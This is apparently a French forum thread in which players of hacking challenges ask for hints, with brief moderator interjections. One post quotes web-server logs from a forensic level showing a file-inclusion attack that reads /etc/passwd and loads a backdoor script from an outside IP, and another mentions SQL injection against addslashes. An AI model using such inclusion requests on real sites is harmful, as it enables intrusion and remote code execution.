Salut merci pour cette épreuve elle est super

mais je n'arrive pas a trouver le pass de john
J'ai trouver un fichier contenant ces info : Oct 15 21:34:40 chaos proftpd[6312] 199.230.171.106: FTP session opened.
Oct 15 21:34:42 chaos proftpd[6312] 199.230.171.106: USER ftpsite: Login successful.
Oct 15 21:34:57 chaos proftpd[6312] 199.230.171.106: FTP session closed.

Donc j'ai chercher dans celui repertioriant toutes les connection et j'y ais trouver ces activité : [15/Oct/2006:21:30:21 +0200] "GET index.php?page=/etc/passwd

[15/Oct/2006:21:31:08 +0200] "GET index.php?page=http://199.230.171.106/backdoor.txt

[15/Oct/2006:21:31:53 +0200] "GET index.php?page=http://199.230.171.106/backdoor.txt&file=pass.php
Je pense que l'intrus as le fichier contenant le mots de pass de john : pass.php
[15/Oct/2006:21:44:29 +0200] "GET images/thumbs/brutus.php
Mais pourquoi il upload brutus dans ce cas ??

et si ce pass.php existe bel et bien ou le trouver ?
Merci de m'aider suis-je sur la bonne vois ?

Salut c'est bien la pour l'épreuve "toujours refléchirs"

Je ne vois vraiment pas quel peuvent être mes possibilité si on pouvais me donner plus d'info (sans me donner la reponse)
et le fait d'avoir trouver le pseudo par simple coup de bol est il normal et sa sert a quelque chose ?

Pour le numero 13 j'ai le nom de compte mais comment trouver le pass vue que la fonction addslashes est activer donc un ne peut pas faire d'injection sql

merci de m'indiquer si je suis sur la bonne voie ps le pseudo je l'ai trouver juste en essayant /* Modéré : chut */

j'ai regarder attentivement les code source des deux page comme il as ete conseiller precedament j'en ai conclus

/* Modéré : on n'explique pas sa démarche. Mais pour te répondre, tu es bien parti. */

Est-ce que je reflechis de la bonne maniere ?

Merci a vous.